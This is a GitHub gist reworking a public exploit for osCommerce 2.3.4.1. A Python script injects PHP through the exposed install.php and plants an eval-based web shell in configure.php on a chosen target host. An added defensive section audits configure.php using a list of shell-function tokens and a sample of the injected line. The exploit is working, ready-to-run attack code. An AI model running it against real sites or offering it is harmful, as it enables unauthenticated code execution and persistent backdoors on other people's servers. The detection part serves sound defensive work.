@Sarverott
Last active October 28, 2024 01:44
```python
# rework of exploit 44374.py from exploit-db.com
# Exploit Title: osCommerce 2.3.4.1 Remote Code Execution
# Date: 29.03.2018
# Exploit Author: Simon Scannell - https://scannell-infosec.net <[email protected]>
# Version: 2.3.4.1, 2.3.4 - Other versions have not been tested but are likely to be vulnerable
# Tested on: Linux, Windows
# If an Admin has not removed the /install/ directory as advised from an osCommerce installation, it is possible
# for an unauthenticated attacker to reinstall the page. The installation of osCommerce does not check if the page
# is already installed and does not attempt to do any authentication. It is possible for an attacker to directly
# execute the "install_4.php" script, which will create the config file for the installation. It is possible to inject
# PHP code into the config file and then simply execute the code by opening it.
import requests

iptarget = input("IP: ")
porttarget = input("PORT: ")
getvallabel = input("label (default: cmd) :") or "cmd"

# enter the target url here, as well as the url to the install.php (Do NOT remove the ?step=4)
base_url = "http://" + iptarget + ":" + porttarget + "/oscommerce-2.3.4/catalog/"
target_url = "http://" + iptarget + ":" + porttarget + "/oscommerce-2.3.4/catalog/install/install.php?step=4"

data = {
    'DIR_FS_DOCUMENT_ROOT': './'
}

# the payload will be injected into the configuration file via this code
# ' define(\'DB_DATABASE\', \'' . trim($HTTP_POST_VARS['DB_DATABASE']) . '\');' . "\n" .
# so the format for the exploit will be: '); PAYLOAD; /*
payload = '\');'
payload += 'if(isset($_GET["' + getvallabel + '"])){eval($_GET["' + getvallabel + '"]);}'  # this is where you enter your PHP payload ######### there was system() here
payload += '//'  ###### this comment was different (/*)
data['DB_DATABASE'] = payload

# exploit it
r = requests.post(url=target_url, data=data)
if r.status_code == 200:
    print("[+] Successfully launched the exploit. Open the following URL to execute your code\n\n" + base_url + "install/includes/configure.php?" + getvallabel + "=echo%201;")
    ###### to the original paths you add ?cmd=die(); # this will kill the execution, for example
else:
    print("[-] Exploit did not execute as planned")
```
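Because the injected value lands in install/includes/configure.php as a define() line the installer would never write on its own, a defender can audit that file for exactly that. The following is an added example, not part of the gist; it assumes every active line of a generated configure.php has the form define('NAME', 'literal'); and runs over a constructed sample config.

```python
import re

# Installer-written lines: define('CONST', 'literal'); with nothing trailing.
DEFINE_RE = re.compile(r"^\s*define\('([A-Z_]+)',\s*'((?:[^'\\]|\\.)*)'\);\s*$")
# Tokens that never belong in a generated osCommerce configuration file.
SUSPICIOUS = ("$_GET", "$_POST", "$_REQUEST", "eval(", "system(", "exec(",
              "shell_exec(", "passthru(", "base64_decode(", "assert(")

def audit_configure(text):
    """Return [(line_no, reason)] for lines of a configure.php that do not look installer-generated."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        hits = [t for t in SUSPICIOUS if t in line]
        if hits:
            findings.append((n, "suspicious token(s): " + ", ".join(hits)))
            continue
        s = line.strip()
        if not s or s in ("<?php", "?>") or s.startswith("//"):
            continue  # structural or comment line, nothing to check
        if not DEFINE_RE.match(line):
            findings.append((n, "not a plain define('NAME', 'literal'); line"))
    return findings

# Constructed sample of a clean, installer-generated configure.php (abbreviated).
CLEAN_CONFIG = """<?php
  define('HTTP_SERVER', 'http://shop.example');
  define('DB_SERVER', 'localhost');
  define('DB_DATABASE', 'oscommerce');
  define('USE_PCONNECT', 'false');
?>
"""
# Constructed sample of the same file after the quote-breakout value from the gist was written into it.
INJECTED_LINE = "  define('DB_DATABASE', '');if(isset($_GET[\"cmd\"])){eval($_GET[\"cmd\"]);}//');"
TAMPERED_CONFIG = CLEAN_CONFIG.replace("  define('DB_DATABASE', 'oscommerce');", INJECTED_LINE)

if __name__ == "__main__":
    for name, cfg in (("clean", CLEAN_CONFIG), ("tampered", TAMPERED_CONFIG)):
        print(name, audit_configure(cfg))
```

Run it against a real configure.php by passing the file contents to audit_configure(); a clean file yields an empty list.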